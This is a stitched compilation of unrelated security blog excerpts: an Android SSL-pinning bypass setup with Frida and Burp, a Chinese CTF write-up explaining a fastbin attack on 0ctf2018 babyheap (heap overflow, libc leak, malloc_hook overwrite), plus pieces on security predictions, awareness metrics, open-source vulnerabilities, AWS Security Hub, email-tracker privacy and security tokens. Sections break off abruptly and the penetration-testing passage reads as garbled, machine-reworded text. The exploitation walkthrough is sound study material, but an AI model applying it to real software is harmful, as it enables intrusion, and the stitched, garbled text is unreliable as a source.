pip for python

adb tools (Android Debug Bridge tools)

local proxy (Burpsuite by Larry_lau, just kidding Burpsuite comunnity edition)

android device rooted (in my case oneplus one with android 8.1) or

android emulator with android 4.4.4 to 8.1

Since there are a lot kind of android devices arquitechtures we need to find out what processor have our device so we need to connect our device to the computer (with usb debugger option activated) and then run this following command:

well, after know the arch now we can download the properly frida-server version for our device, in this case frida-server-XX.X.X-android-arm in this frida github releases link (since the lastest version didn’t work I highly recommend download this versionfrida-server-12.0.5-android-arm.xz, anyway you can try with newer version if you want to), once is downloaded we need to extract the frida server and then copy it to the device

Once we have installed frida(computer) and frida-server (android) we can start interacting with frida with the following commands:

The quickiest way to setup a connection between our devices is get connected the android device and computer in the same wifi, so we just need to set up the android wifi connection to manual proxy in advanced section and also set up Burpsuite with the local computer ip (don’t forget use the same port)

also we need to install the burpsuite certificate, once the android device have the proxy set up we need to access to http://burp in browser, then click the “CA certificate” buton and download the certificate (Note, you need to change the certificate extention from der to cer)

So, we got frida, frida-server and burpsuite running as espected, the next step is run the“Universal Android SSL Pinning Bypass No.2” script in order to start sniffing the application connections so we need to get the script and saved locally as name_script.js, here is a blogpost about this script by Mattia Vinci (you can add several scripts to frida from the repo or custom scripts too)

so the only thing that we have to do is save this script as “frida-ssl-2.js” and run the following command:

then the application is going start you are going to see the results in burpsuite

随着堆的学习，最近一直保持着有关libc堆漏洞利用的文章的更新，之前以babynote为例讲了unsorted bin attack，这次以0ctf2018 babyheap为例讲解一下fastbin attack的东西。

堆的知识细节很庞大，每次pwn一个challenge都会收获很多东西。之前是复现的babynote那道题，但毕竟是参考了别人的exp自己心里还是没底，而这次的babyheap的exploit开发则是彻头彻尾自己完成的，过程和结果令人惊喜：自己写出的有效exp之后和网上的exp进行了对比，发现思路有比较大的出入，也就意味着学到了更多的东西。

题目链接

丢进IDA，main函数F5，如下（函数名我已进行手动重命名）：

我们的堆块就是通过该函数分配，索引表的结构就是传统的堆题目结构，由exist字段、大小字段和用户区指针构成；值得注意的是此处使用的内存分配函数是calloc而不是malloc，calloc分配chunk时会对用户区数据进行置空，也就是说之前的fd和bk字段都会被置为0，这在进行内存泄露时会造成一定的难度；返回的chunk下标也是传统的exist字段遍历法，下标从0开始。

可以看到，程序并没有对用户输入的Size长度进行检查，这就造成了任意长度输入，形成堆溢出漏洞；此外，输入没有尾补字符串结束符，有可能会造成内存泄露(该程序后经分析，内存泄露不利用此处缺陷)

可以看到，这段free函数写的是很安全的，首先对用户通过下标选择进行free的chunk在索引表层面做了存在性检查，如果exist字段为0说明已经free便不再继续执行free，这有利于防范double free；free成功后，相应的索引表的exist字段置空、堆指针置NULL也做到位了。总之该部分没有安全漏洞。

其中sub_130F():

这个读内容函数也是安全的，首先作了存在性检查，如果exist字段为0就不会去读，也就是说只能读new过的记录；并且读取用的是write而不是puts，write读的长度也是索引表中记录的长度（即当初new的时候输入的长度的多大就只能读多大 ）

该程序存在堆溢出漏洞，但是由于其他保护作的较好，在泄露内存阶段应该会遇到较大阻力；堆溢出漏洞可能带来Fastbin Attack的机会。

在进行具体分析之前，我们先粗略讲一下fastbin attack的相关知识：

（详细讲解请参考ctf wiki上的教程）

1.fastbin是单链表，按chunk大小递增一共有好几个，用户free一个chunk以后，如果大小是属于fastbin的、又不与top chunk相邻，就链入fastbin中大小对应的单链表

2.fastbin单链表是个栈，LIFO，链表结点(被free的chunk)的插入用的是头插法，即紧邻表头插入，fd指针则往链尾方向指向下一个chunk（此处的“头尾”是以表头为头）

4.fastbin的相关安全检查：首块double free检查，当一个chunk被free进fastbin前，会看看链表的第一个chunk是不是该chunk，如果是，说明double free了就报错；分配前size字段校验，从fastbin表中malloc出一个chunk时，拆卸前会检查要分配的这个chunk的size字段是不是真的属于它当前所在的fastbin表，如果size字段的值不是当前fastbin表的合法chunk大小值，则报错，其代码 ((((unsigned int)(sz)) >> (bitl == 8 ? 4 : 3)) 2)；根据size算得应在的表的下标，再和当前所在fastbin的下标对比

5.fastbin chunk头部字段特点：presize为0，size的inuse位恒为1（不被合并，符合当时设计常驻较小块以提高效率的初衷）

6.fastbin attack：用过一定手段篡改某堆块的fd指向一块目标内存（当然其对应size位置的值要合法），当我们malloc到此堆块后再malloc一次，自然就把目标内存分配到了，就可以对这块目标内存为所欲为了（可以是关键数据也可以是函数指针）

下面正式开始分析：

我们的主要思路就是首先泄露得到libc的基地址，然后通过fastbin attack篡改libc中某个函数指针，最终在调用的时候实现劫持并get shell

唯一有输出的地方就是程序的print_log()函数，只能利用这个函数泄露内存

而这个函数打印的东西都是chunk内的内容，自然想到应该是通过泄露chunk的fd和bk指针泄露libc_base地址

马上排除通过fastbin chunk泄露的可能性，因为fastbin chunk只有fd没有bk，而fd是往链尾指的而且是单链表，只能指向堆的地址，怎么也不可能指向fastbin表头，因此也无法通过偏移计算泄露libc_base

所以是通过unsorted bin来泄露libc_base！

阻碍：读的内存长度有限制，只能读当初new时输入的长度；calloc时会置空用户区数据，残存的fd和bk将被置零；chunk只有索引表exist指示存在时才能读

先考虑如何绕过calloc和exist：首先如果你要读fd和bk，就不能被置空，也就是说你读的fd和bk所在的堆块必须是free的，那么它的索引表exist肯定指示不存在不能读

所以现在看来，我们只能读exist即inuse 的堆块，又要读的出free的堆块里的内容

也就是说我们必须能够通过读一个exist即inuse 的堆块打印出某个free的堆块里的内容

要达到这个目的，唯一可能的情形就是：这个exist的堆块对应的索引表中的Size足够大，大到把某个free态的堆块也包含了进去，这样读这个exist的堆块时就可以读到free块的fd和bk

我们下面将用Size来代表这个足够大的长度值

那么这个大大的Size肯定是在new_log()之初就由用户输入了的，也就是说calloc时传入的大小就是这个Size，但是calloc时会置零，也就是说被包含进来的那个free态的堆块肯定不能是先free了再被这个exist的堆块包含进来（因为这样那个free态的堆块的fd和bk就置零没了），所以一定是calloc时还不是free的，calloc后再free掉，然后再读calloc到的堆块进行泄露

那么问题来了：calloc(Size)时如何能分配到一块包含了另一个占用态堆块的堆块呢？calloc到的堆块无非来自两种情况，要么是从bins中已有的块中直接拿出来的，要么就是从top chunk切下来的；显然，不能是从top chunk切下来的；所以是从bins中直接拿出了一个chunk，也就是说之前在bins中就已经存在这个大小为Size的chunk了（我们根据特点将这个大小为Size的堆块称作“怀孕块prgnt chunk”）

那么怎么构造这样一个bins中的prgnt chunk呢？或者说换种说法：怎么让它“怀上”肚子里的泄露目标chunk呢？有经验的pwn狗稍加思考就想到了：伪造size字段！方法自然是堆溢出！

只要能够将与“胎儿堆块”(fetus chunk)相邻的prev_chunk(即bins中的prgnt chunk)的size字段篡改的更大，大到把fetus chunk也包含进去了(也就是篡改为Size)，那么在用户以Size为输入长度通过调用new_log执行calloc(Size)的时候，就会在bins里找到我们伪造出的这个size字段值为Size的prgnt chunk，分配出来就得到一个我们所需要的大小包含了一个inuse态的fetus chunk的prgnt chunk了

calloc到prgnt chunk后，我们只需要调用edit_log()编辑prgnt chunk来把还是inuse态的fetus chunk的presize字段和size字段写成合法值（被置零了），然后free掉fetus chunk（这时候就有fd和bk了），再调用print_log()读prgnt chunk就可以读出fetus chunk的fd和bk了（即前面所提到的calloc后再free掉，然后再读calloc到的堆块进行泄露）

显然prgnt chunk与fetus chunk都必须是unsorted_bin chunk，此外还需要一个保护堆块来殿后，防止合并进top chunk，然后在最前面还需要随便放一个堆块用来发起溢出，因此一共需要四个堆块，大小都是unsorted_bin chunk就行

泄露出的是main_arena__unsorted_bin的地址，通过偏移计算即可得到libc_base

先往fastbin里free一个chunk进去，溢出踩掉这个chunk的fd指针，把fd劫持到malloc_hook附近，然后连续calloc两次就得到一个指向malloc_hook附近的用户指针了，然后就可以将malloc_hook改写为我们的劫持目标地址（比如onegadget），之后再调用new_log()执行calloc的时候就可以把程序执行流劫持到onegadget然后get shell了

hook劫持、RELRO保护、错位构造size、onegadget

往常劫持函数指针我们常常是用GOT表劫持的手段，而仅就笔者目前的了解，就至少有两种情况是GOT表劫持行不通的：一个是RELRO保护全开、一个是fastbin须size错位

RELRO是一种加强对数据段保护的技术，当其完全开启时（full），GOT表就不会采用延迟绑定，而是在程序加载之初就一次性全部绑定，此后将GOT表属性设置为不可写，这样一来就无法篡改GOT表了

size错位就是我们今天遇到的情况，前面说过fastbin的安全检查之一就是size字段校验，因此如果我们想通过劫持fd至目标内存进而分配到目标内存，就必须保证在目标内存附近能够找到一个qword能够充当合法的size字段，绕过校验，这就是我们所说的size错位构造；而实践经验证明，在GOT表内，似乎并不能找到这样一个qword来错位构造size，因此fastbin attack攻击GOT表是行不通的

因此fastbin attack中我们选择攻击hook，先来讲一下hook：hook就是钩子函数，设计钩子函数的初衷是用于调试，基本格式大体是func_hook(*func,<参数>)，在调用某函数时，如果函数的钩子存在，就会先去执行该函数的钩子函数，通过钩子函数再来回调我们当初要调用的函数，calloc函数与malloc函数的钩子都是malloc_hook：

（libc2.23源码中malloc的定义）

（IDA中的malloc的定义）

（libc2.23源码中calloc的定义）

（IDA中的calloc的定义）

综上四幅图可以看到，在调用malloc/calloc时，执行核心代码前都先判断了malloc_hook是否存在，如果存在的话都会先调用malloc_hook！

所以我们来看一下malloc_hook附近的内存布局：

（图.hook汇编窗口）

可以看到malloc_hook紧邻main_arena

我们fastbin attack都是攻击malloc_hook，也就是说在malloc_hook附近可以错位构造出一个合法的size字段，我们到hex界面看一下这个size是怎么构造出来的：

从3C4AF0到3C4B18，对照“图.hook汇编窗口”，各个qword分别是：

我们的攻击目标就是malloc_hook即0x3C4B10，这个位置需要处于分配到的chunk的用户区中，从这个位置往上找可以错位构造size字段的qword，就只能找到0x3C4AF0和0x3C4AF8，原因如下：

因为0x3C4AF8处的align 20h是固定不变的，永远都是00 00 00 00 00 00 00 00，注意其他几个位置在图中的hex都并不是实际运行时的值，实际运行时会附上真实的地址值，有经验的话应该能猜到这几个实际运行时libc地址长度都是6字节，且最高位字节为7f，这样一来就只能找到那一个位置可以错位构造size了，就是0x3C4AF0的最高字节7f加上往后的7个字节长度的00构成一串qword：7f 00 00 00 00 00 00 00，可以作为合法size字段值！

Penetration testingmay be the practice of analyzing an application by qualified protection pros (aka penetration testers or malicious hackers) to be able to find out its security vulnerabilities. The aim of carrying such a test is always to strengthen the security vulnerabilities that the software may comprise therefore they don’t get readily exploited (or cared for) from the hacking group.

In the case of web app penetration testing, the applications being tested is a web application kept in a distant server that clients can access over the web. Online software is always straightforward targets for hackers and so it’s critical for the programmers of these applications to usually carry out penetration testing to ensure their world wide web applications stay fit ― away from numerous safety vulnerabilities and malware strikes.

In this site, let us take a look at a number of the weather every internet application penetration testing checklist needs to comprise so that your own web testing services to be extremely powerful.

Essentially the very preferred entry position for spammers is many times a web program’s contact form. Which means contact kind you’ve got in your internet application needs to be in a position to spot and prevent such junk attacks. Including CAPTCHA is just one of easy and simple methods for preventing contact sort spamming.

You can also read this full article at https://testingxperts.blogspot.com/2018/12/web-application-penetration-testing.html

This time of the year is always exciting for us, as we get to take a step back, analyze how we did throughout the year, and look ahead at what the coming year will bring. Taking full advantage of our team’s expertise in data and application security , and mining insights from our global customer base, we’ve decided to take a different approach this time around and focus on three key, and overriding trends we see taking center stage in 2019.

2018 brought with it the proliferation of both data and application security events and, as we predicted, data breaches grew in size and frequency and cloud security took center stage globally. With that in mind, let’s take a look at what next year holds.

Data breaches aren’t going away anytime soon, which will bolster regulation and subsequent compliance initiatives

Look, there’ll be breaches, and the result of that is going to be more regulation, and therefore, more compliance, this is a given. In fact, the average cost of a data breach in the US 2018 exceeded $7 million.

Whether it’s GDPR , the Australian Privacy Law, Thailand’s new privacy laws or Turkey’s KVKK; it doesn’t matter where you are, regulation is becoming the standard whether it be a regional, group, or an individual country standard.

Traditionally when we looked at data breaches, the United States lit up the map, but as regulatory frameworks and subsequent compliance measures expand globally, we’re going to see a change.

What you ’ll see in 2019, and certainly, as we move forward, is a red rosy glow covering the entire globe. In 2019 you’ll hear more of “It’s not just the United States. This happens everywhere.”

Let’s unpack this for a second. If you were going to steal private data or credit card details, why would you do it in an environment that has world-class, or even mediocre cybersecurity measures in place? If everyone else is even slightly less protected, that’s where you’re going to find people targeting data, but we hear more about it in regions where regulation and compliance is a major focus.

To that end, we don’t necessarily see 2019 as the year where regulators start hitting companies with massive fines for compliance . Maybe by the end of the year, or if you see outright egregious negligence. But, you’ll find that companies have put in the legwork when it comes to compliance.

McKinsey reports that, by 2020, organizations will be spending more than six times on cloud-specific products than they do on general IT services; and according to a survey by LogicMonitor , up to 83% of all enterprise workloads will be in the cloud around that same time.

Organizations continue to capitalize on the business benefits of the digital economy and, as such, end up chunking more data into the cloud. Now, we’re not saying that this is being done without some forethought, but are they classifying data as they go along and increasingly open their businesses up to the cloud?

Teams need to recognize that, as they transition their data to the cloud, they transition their awareness of what’s in the cloud; who is using it, when they’re using it, and why they’re using it. 2019 isn’t going be the year that businesses figure out they need to do that. What we will see, however, is increasingly cloud-friendly solutions hit the market to solve these challenges.

One of 2019’s most critical developments will be how the cybersecurity industry steps up to meet the increasing pressure on security teams to perform. According to the Global Information Security Workforce Study , the shortage of cybersecurity professionals will hit 1.8 million by 2022, but at the same time, a report by ESG shows just nine percent of millennials are interested in a career in cybersecurity.

What we’re going to see is how AI and machine learning in cybersecurity technology will close the gaps in both numbers and diversity of skills.

Organizations today have to solve the problem of cybersecurity by hiring for a host of specialized competencies; network security, application security, data security, email security and now, cloud security. Whatever it is, underscore security, those skills are crucial to any organization’s security posture.

Here’s the thing, there aren’t a lot of people that claim to know cloud security, database security, application security, data security, or file security. There just isn’t a lot. We know that and we know businesses are trying to solve that problem, often by doing the same old things they’ve always done, which is the most common solution. Do more antimalware, do more antivirus, do more things that don’t work. In some cases, however, they’re doing things around AI and trying to solve the problem by leveraging technology. The latter will lead to a shift where organizations dive into subscription services.

There are two facets driving this behavior: the first is the fact that, yes, they realize that they are not the experts, but that there are experts out there. Unfortunately, they just don’t work for them, they work for the companies that are offering this as a service.

Secondly, companies are recognizing that there’s an advantage in going to the cloud, because, and this is a major determining factor, it’s an OpEx, not CapEx. The same thing is true of subscription services whether that be in the cloud or on-prem, it doesn’t matter. Driven by skills shortages and cost, 2019 will see an upswing in subscription services, where organizations are actually solving cybersecurity problems for you.

We should add here, however, that as more organizations turn to AI and machine learning-based decision making for their security controls, attackers will try to leverage that to overcome those same defenses.

Depending on the size and needs of your organization, a security awareness program usually equals a significant investment of time and funds. However, a program that is properly designed will assist in helping to reduce the number of security incidents affecting your environment. Since this is such a valuable tool, how can an organization determine if the plan they’ve “purchased” is working?

As always, we need to gather data to see how we’re doing. What should we be looking at?

This article will discuss options for obtaining the needed information and how you can use that data to further refine your awareness program.

With any security program, one of the first items that should be in place is a notification system or process where employees can report incidents. Perhaps your organization already has this in place as part of your help desk functions or first-tier technical support.

It would be beneficial if this team is using a searchable database to log all reported issues in the form of work tickets. This database should also allow exports of data and be able to search according to incident type, date range, number of occurrences, severity, total amount of incidents opened and closed and length of time it took to close (in days and hours).

Logging the incident type is very important, as this will allow you to measure different aspects of your awareness program and help you understand where your training may need to be tweaked. Below are some examples of incident types that can be used for this purpose.

As your security team begins to go through their work tickets, you’ll start to see trends in the types of issues that are addressed. Depending on how granular your database can get, you can start creating reports to show where employees need the most help and where the awareness program can be modified.

Once the desired metrics are identified, it will be very important to establish the frequency in which these metrics should be monitored. This allows key metrics to be reviewed in order of priority and ensure that none are missed.

Having a functioning Security Information and Event Management (SIEM) tool in your environment is also invaluable, as this provides detailed data points regarding your network. These tools can identify items such as rate of infection, network anomalies and authentication failures across the entire monitored environment. For example, how many times does an alert for a particular infection get reported in your SIEM? Is it usually the same individual that falls victim to the issue in question? Depending on the answers to your unique questions, this will show where your program is succeeding or failing.

The InfoSec team and Human Resource representatives can also work together to increase security and awareness. When new employees are hired, have a small presentation prepared as part of their orientation. During this brief presentation, a security representative can speak about some of the threats facing the organization and how each employee can contribute to the security posture of the company. HR can ensure that each employee understands company policies and answer any questions that may arise as a result. If these questions are logged, they can be submitted to the security group as another metric.

Depending on the frequency of certain questions, the security team can tweak policies to ensure they are written in a way that clearly communicates their purpose. The same is true of overall security threats. If new employees are asking repeated questions on certain threats this can alert the security group to include certain material in future awareness sessions, so the user base is properly educated.

Consider working with the HR department to disseminate awareness surveys. Small periodic training modules or quizzes can be developed and sent to the employee population as required training. The modules should highlight threats that are actively affecting the organization as per reviewed metrics and then require the employees to answer specific questions around these issues. The rate of incorrect answers can provide insight into current employee knowledge and what can be improved.

Social engineering exercises are another active way to test employees’ reactions to certain attack methods and provide valuable metrics to awareness efforts. Contracting with an external partner experienced in this area can help an organization strengthen and empower employees by teaching them the correct manner of handling a wide range of threats. The results provided by the external partner can help to further shape the company’s security awareness program and uncover other areas that may require further attention.This article discusses some items to keep in mind when planning an initiative of this type.

Once all required metrics are identified, they should be organized into a system similar to a dashboard or scorecard where the results of each metric over a range of time can be seen at a glance in the form of a bar graph or other charting system. For example, one portion of this dashboard should show the metric type and how many occurrences of the issue appeared in a given month. Other sections of the dashboard can show how many individuals repeatedly dealt with a given issue versus how many individuals reporting the issue were new.

Having a section dedicated to the number of hours worked per issue can quickly help to show how much time is being invested by the security group in handling these matters. When the data starts to take form, it may be possible to even create timelines of major problems based on the data trends. Patterns may start to emerge for certain attacks. This can also assist the security group by preparing proactive strategies to address them and provide tailored awareness information at key points in the year.

Security+

In line with this thought of “key points in the year,” some companies have organized yearly Awareness Days that employees can attend in order to learn about the emerging threats that are impacting the organization and how they can protect themselves. These events can be planned using trade shows as a model. This type of environment is casual and presents many opportunities for employees to engage the security team and ask specific questions. The security team can also design demonstrations of certain threats to illustrate how they occur, which will help cement the ideas in the minds of the attendees.

Employing teaching tools such as educational games that have the aim of testing the employee’s knowledge of specific security subjects is also very useful during these events.

During this article, we’ve reviewed certain methods that can be employed to measure improvements in employee behavior when it comes to security matters. The metrics that are created as a result of using some of these methods can quickly help a security team understand how deeply the awareness program is impacting their organization and determine the maturity of their particular educational program.

When it comes to open source software, it’s natural for development and security leaders to want to know that the code they’re using is secure. Historically, they’ve relied on traditional software composition analysis solutions and the National Vulnerability Database to mine for open source issues. Yet there is a little-discussed fact that open source begets open source. We know that developers use open source libraries to speed up the development process by adding ready-made functionality to their code. The libraries that they select and use are called direct dependencies, and often times, those direct dependencies have dependencies of their own.

Just like any other piece of software, open source libraries often rely on other open source libraries to achieve the desired functionality and goal. When developers choose an open source library, they may not be aware of the indirect dependencies they are stitching into their software. At Veracode, we’ve seen anywhere from two to more than 10 levels of libraries being called on, one after the other. Once you start assessing each level of library, the volume of vulnerabilities can skyrocket beyond your team’s ability to manage them.

Using software composition analysis is an amazing first step to solving some of this open source risk, but what happens when an open source library contributor fixes a security vulnerability and doesn’t tell anyone? Or the time between submission and publication, with an organization like the National Vulnerability Database, is too long to wait?

The National Vulnerability Database (NVD), upon which most traditional SCA solutions rely, is a robust and widely used source of vulnerability data available today, cataloguing tens of thousands of vulnerabilities across all application types and open source libraries. While it is no doubt a valuable and necessary library of flaws and fixes, through no fault of its own, the organization is unable to keep pace with the volume of vulnerabilities disclosed and updated on a daily basis. Open source library vulnerabilities get stuck in a logjam behind everything else that is disclosed.

It’s important to note that vulnerabilities only make it into the database if a software developer or independent security research submits them. It’s common for a vulnerability to be fixed, but never disclosed or submitted to the NVD. For example, the Apache Struts Remote Code Execution vulnerability the same type that led to the Equifax breach in 2017 was disclosed to the public in August 2018, but was patched in April of that same year.

Four months is plenty of time for malicious actors looking to take advantage of vulnerable software. If they were monitoring the commit logs of the library, they would have been aware of it before organizations could update to the latest version of the component.

Machine learning technology has the ability to automate the identification of potential security vulnerabilities from commit messages and bug reports. In open source projects, bugs are typically tracked with issue trackers, and code changes are merged in the form of commits to source control repositories. If an organization is able to monitor all of these repositories, and review each new bug issue and commit message, they could identify potential vulnerabilities. However, there are tens of thousands of open source repositories, with hundreds of thousands of bug tracking issues and commit messages to comb through, with new ones hitting every day.

Natural language processing and real machine learning can identify potential vulnerabilities in open source libraries with a high level of accuracy. By analyzing the patterns found in past commit messages and bug-tracking issues using machine learning, our model can identify when new commits or bug issues resemble a silent fix of a potential vulnerability. These potential vulnerabilities are then raised to security researchers.

These silent fixes can be a silent killer for your data protection.

We have developed our own database that includes all of the open source vulnerabilities in the NVD, as well as our own list of vulnerabilities in open source libraries that have not yet been disclosed to the NVD. In many cases, the vulnerabilities we find and record have either not been disclosed yet and are in the time between patching and full public disclosure, or in some cases, there was never any intent to disclose the vulnerability and its fix. There is a third category we track, which are “Reserved CVEs.” We take the Reserved CVE IDs from the NVD and then find the vulnerabilities in the public repos, in order to give you a head start on the fix prior to full public disclosure.

To learn more about how to use these silent fixes to your advantage by putting your development team on an even playing field with attackers, download our free white paper: https://info.veracode.com/whitepaper-solving-your-open-source-risk-with-sourceclear.html

A primary concern for companies moving to the cloud is whether or not their workloads will remain secure. While that debate still happens, AWS has made great strides to assuage customer’s concerns by adding services to ensure workloads are well protected. At re:Invent 2018 another service named AWS Security Hub was added. Security Hub allows you to setup some basic security guardrails and get compliance information for multiple accounts within a single service. Amazon seems to have realized that enabling customers to very easily see their security recommendations for all environments in a single place has great value to their businesses.

To setup AWS Security Hub, we first have to pick an account where our portal will live. Login to your AWS account of choice and navigate to “Security Hub” in the AWS console. Once you’ve logged in, you’ll need to enable the security hub service by clicking the button on the splash screen.

Once you click that button, you’ll be asked again to add Security Hub which will update some policies to give AWS permission to aggregate findings and read information from your accounts.

Once enabled, you’ll see a summary screen with some very uninteresting information on it at this point. To make Security Hub work really well, you’ll need to enable some things which will then be aggregated into the Security Hub console. To begin, we’ll enable the CIS Benchmarks which are a good baseline for how your cloud should be protected. Now, the important thing here is that CIS benchmarks are going to use AWS Config rules to ensure that specific cloud security metrics are monitored. Before you enable CIS Standards on the standards menu, be sure to enable AWS Config in the account you’re monitoring. This can be done via CloudFormation or through the console but be sure to enable AWS Config to record events for the region and globally.

Once Config has been enabled, it’s OK to enable the CIS Standards from the standards menu.

Once the CIS Standards have been enabled, a series of AWS Config Rules will be deployed. These might take a few minutes to show any data, but do note that these config rules cost $2 per account per region to use. Once Config has evaluated the rules you should see some data in the AWS Config console if you look at that service. You can see from my screenshot below that there are AWS Config Rules with a prefix of “securityhub” listed in my compliance rules list. You’ll also notice that I have some noncompliant resources, which were intentionally left noncompliant for demonstration purposes :wink: .

If we look back in Security Hub the Summary screen will now start showing some useful data about our compliance metrics.

We’ll also see that these benchmarks now show up in my security hub findings with a status of either FAILED or PASSED. It also shows the CIS benchmark title for which benchmark has been missed if any of them are failed.

There are also additional providers that can be added to the Security Hub to make it more extensible. Out of the box there are three more services that AWS will aggregate in your findings list which are:

You can set those three services up in your AWS Account to have their findings aggregated within the Security Hub service console. There are also third party services that can be added to the console and this can be done by going into the “Settings” menu and enabling them from the providers screen. This makes Security Hub a “single pane of glass” for aggregating your compliance and security findings.

So far we’ve done all the configuration within a single account, but what if we’ve designed our AWS environments with multiple accounts for billing or security reasons? Not a problem, we can go back into the settings of our Security Hub console and we can invite other accounts. To do this go to the Accounts tab and invite another account. When you invite another account nothing will happen until the member accounts accept the invitation.

To accept, we’ll login to the member account and go into the Security Hub console just as we did with our master account. Then under settings, we’ll see an invitation from the master. Click the Accept slider button to accept the invitation. Once this is complete, the results for the member account will be displayed in the master account’s Security Hub console. Be sure to enable config, GuardDuty, Inspector, etc on the member accounts too so that all your findings are being sent along correctly.

AWS Security Hub is a really nice to have service to bring all the individual compliance and security tools AWS offers into a single view for administrators. As of the time of this writing, the Security Hub service pricing is not available yet, but you will be charged for the services it relies on such as AWS Config and GuardDuty. If you’re setting up a production AWS environment, Security Hub should be part of your basic deployment routine.

My name is Vadym, I am from Anti-Malware Lab (former Kromtech Security Center). Our research project focused on monitoring digital risks and privacy violations. Here’re our recent research findings. If you have questions, concerns or ideas to update it―please, comment here or contact me.

If you were wondering whether you can rely on the privacy email trackers in Chrome, the short answer is: Not really.Two of the three most popular email tracking extensions we analyzed are receiving content from the body of your email even if this is not necessary.

You have to watch your back in extension stores. This is especially true in Chrome with the almost 60 percent market share that makes the browser a nice piece of pie for cybercriminals. Google says that 70 percent of the malicious extensions are blocked, but a steady stream of recent research findings show that the problem is far from resolved.

I want to emphasize that extensions shouldn’t be malicious to be dangerous. The collection of unnecessary (for extension work) user data could potentially lead to problems on par with malware cases.

Based on feedback from some of our users, we decided to analyse three popular free mail trackers ― Yesware, Mailtrack, and Docsify. Each of them allows tracking email open and reply rates, link clicks, attachment opens, and presentation pageviews as well as allowing copies of important emails to be sent directly to your CRM automatically.

We looked at the permissions that each extension requests, the actual data from your email that goes to the extensions’ hosts, and how this is all shown in the Privacy Policy. Here’s a breakdown of what we found.

Usually, such extensions only require this level of permission on a specific website. For example, the official Google Mail Checker (email tracking for Gmail) asks to “Read and change your data on all google.com sites.”

As far as I can tell, the extension developers decided to ask for “unlimited” permission instead of bothering you with an extended list of websites where their extension is going to interact. However, you need to understand that in accepting this you are giving Yesware much more accessibility than it needs for its actual work.

Interestingly, we noticed that after confirming the permissions for the extension, you then have to confirm other permissions ― for the app.

It’s important to know that permissions that present like the screenshot above are related to the app, not the extension.

What does it mean? Essentially, if you decide to delete the extension, the app will still have an access to your data.

Similarly, Docsify asks permission to read and change all your data on the websites you visit. Permissions are required by the application as well.

Mailtrack,in contrast to the first example, doesn’t ask users to access to all websites, only email-related websites.

These permissions are standard for this type of extension ― to read, send, delete, and manage the emails.

The most interesting part of our investigation came from analyzing the email content which every extension collects and processes. At this stage, we used Burp , a tool for testing Web application security. Its proxy server tool allows us to inspect the raw data passing in both directions ― in our case, from sender to extension data storage.

The Yesware Privacy Policy and Terms of Use don’t include information regarding storage of the data from your email. However, our research shows that the app does manage email data storage.

To be clear, we tested the free version of Yesware without CRM integration. After composing and sending an email, we checked the host app.yesware.com in Burp to find the data from the email message that was sent there.

It’s easy to notice that our email body went to the Yesware host. In other words, the extension collected and processed the entire content of this personal email.

It’s easy to notice that our mail body went to the Yesware host. In other words, the extension collected and processed the entire content of this personal email.

Surprisingly and importantly, when we deselected the Track and CRM checkboxes in order to stop tracking any activity related to your emails ― t he situation remained the same.

The Yesware sent the body of an email even in this case.

We determined that only by turning off all the features in the extension preferences helped. In this case no data was sent to host.

In order to get an explanation for all this, we sent an email to Yesware support. The first email to support@yesware.zendesk.com . (12 October 2018) you can find below.

Dear Yesware Security Team

John Wu

You own a startup, or an office building in Manhattan, and you’ve heard a lot of buzz about turning your asset into a security token. You likely have many questions, such as “What is a security token?”, “Why should I use a security token?”, and “How do I do that?”. I am going to help answer those questions and explain why issuing a security token is just a faster, more modern, and more valuable extension of a traditional security issuance.

A “security token” is legally identical to a traditional security. The only difference between a security and a security token is the manner in which ownership is recorded. Simply put, a security token is a security that has been turned into a digital asset on a blockchain. If that sounds foreign to you, take a look at this helpful primer put together by Deloitte that explains the basics of blockchain technology.

To give a quick overview: a blockchain is a permanent ledger of transactions shared across a network of computers (nodes). In order for a transaction to be added to the ledger, it must be verified by other members of the network, after which it is stored in an entry “block” at the end of a sequence “chain” of all previous blocks. Because of the nature of how data is verified and stored on the blockchain, there are a couple characteristics that make it an ideal mechanism for recording and transferring ownership of assets:

I heard a useful analogy for the tokenization of assets from Harbor CEO, Josh Stein. He equates the difference between a security token and a security to the difference between email and snail mail. Before email came along, written correspondence was slow and inefficient. Because of the effort that went into sending a letter, people simply did not send them that frequently. Not only that, but the recipient of a letter had to wait several days before the message got to them.

Email has made communication more efficient and more common. Think of all of the emails you send. For how many of them would you have taken the time to write a letter, address an envelope, put the letter in the envelope, lick, seal, stamp, and send? Tokenization offers the promise of both a more efficient securities market, and a larger and more active securities market. Much like the evolution from snail mail to email caused written communication to be more efficient and more common, tokenizing securities will make trading more frequent and more efficient, and will make more asset classes accessible to investors.

There are many advantages that issuing a security token has over a traditional security. The primary benefits can be broken down into transparency, automated settlement, fractionalization, global availability, and liquidity.

The transparent nature of each transaction means that the blockchain serves as a public record of ownership for your security token. Currently, private issuers are required to maintain a capitalization table recording the ownership of their security, which can be expensive. Companies are also only permitted to have a maximum of 2,000 shareholders before they are required to go public. Because of this, most private companies restrict their shareholders from transferring shares, which harms investors and employees by denying them liquidity. Through tokenization, it is possible to code regulations into the token, allowing issuers to authorize trading without having to worry about running afoul of SEC regulations. Issuing tokens instead of certificates eliminates recordkeeping costs and increases shareholder liquidity.

Settling trades via blockchain reduces transaction costs. In a traditional securities transaction, there are several parties responsible for acting as a trusted intermediary to help settle the trade. For instance, central counterparty clearing acts as a trusted third party in the middle of trades to protect against either party defaulting. It is impossible to default in a security token trade, as the transaction can only be confirmed if both parties have sufficient funds to cover their obligations. Therefore, there is no need for rent-seeking third parties to participate in the trade.

Tokenization also greatly reduces transaction time. Traditional public equity trades settle T+2. This means that a transaction is confirmed 2 business days after it is initiated. So if you purchase shares on Monday, the transaction is not actually completed until Wednesday. Private equity trades can take anywhere from 30 to 90 days to settle. A security token trade is confirmed as soon as the exchange of tokens is confirmed on the blockchain. Nearly all security tokens are issued on the Ethereum network, and the average time for a block confirmation on Ethereum averages 10 20 seconds, so tokenization reduces settlement by orders of magnitude.

Let’s go back to that office building in Manhattan. Assume it’s worth $100MM. Trying to sell a hundred-million dollar asset is always going to be difficult, and ultimately results in you selling the asset for less than full value. There are a couple of reasons behind this discount: first, because the number of buyers willing to purchase such a large asset is limited, and second, because buyers understand the illiquid nature of the asset, and are not willing to pay as much for an asset that is difficult to resell. Now imagine you can split up your office building into a million freely tradable shares. Through tokenization, nearly all investors can afford to own a piece of New York real estate, increasing demand, and because the shares are liquid, investors are willing to pay more for each fraction of the real estate. You have just sold the building for more than you would have otherwise, simply because the ownership was tokenized.

